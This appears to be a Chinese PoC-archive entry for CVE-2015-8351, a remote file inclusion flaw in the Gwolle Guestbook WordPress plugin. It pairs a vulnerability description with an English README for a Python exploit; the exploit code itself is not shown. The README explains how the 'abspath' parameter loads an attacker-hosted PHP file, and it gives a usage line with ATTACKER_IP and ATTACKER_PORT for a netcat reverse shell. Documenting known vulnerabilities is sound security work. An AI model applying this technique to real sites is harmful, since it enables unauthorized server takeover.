关联漏洞
标题:
WordPress Gwolle Guestbook插件安全漏洞
(CVE-2015-8351)
描述:WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。Gwolle Guestbook是其中的一个留言板插件。 WordPress Gwolle Guestbook插件1.5.3及之前版本中存在远程文件包含漏洞,该漏洞源于程序没有充分过滤用户提交的输入。远程攻击者可通过向frontend/captcha/ajaxresponse.php文件发送带有URL的‘abspath’参数利用该漏洞执行任意的PHP代码。
描述
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
介绍
<h1>Gwolle Guestbook WordPress Plugin RFI Exploit</h1>
<p>This Python script exploits a critical Remote File Inclusion (RFI) vulnerability in the Gwolle Guestbook WordPress Plugin, which can be exploited by a non-authenticated attacker to include a remote PHP file and execute arbitrary code on the vulnerable system.</p>
<h2>Vulnerability Details</h2>
<p>HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from an arbitrary remote server and execute its content on the vulnerable web server. In order to do so, the attacker needs to place a malicious 'wp-load.php' file into their server document root and include the server's URL into the request.</p>
<p>Successful exploitation of this vulnerability can lead to the compromise of the entire WordPress installation, and may even lead to the entire web server's compromise.</p>
<h2>Usage</h2>
<p>The script requires three arguments:</p>
<ul>
<li>Target URL: The URL of the vulnerable WordPress installation.</li>
<li>Attacker host: The IP address or hostname of the attacker's machine.</li>
<li>Attacker port: The port number where the attacker is listening for a reverse shell.</li>
</ul>
<p>Example:</p>
<pre><code>python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT</code></pre>
<p>Note: You need to have a netcat listener open on the attacker machine on the specified port.</p>
<h2>Disclaimer</h2>
<p>This script is provided for educational purposes only. The author is not responsible for any damages caused by the misuse of this script.</p>
文件快照
[4.0K] /data/pocs/fe5a3c18655dca498f7258e9a6991828f24b6464
├── [ 808] exploit.py
└── [1.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。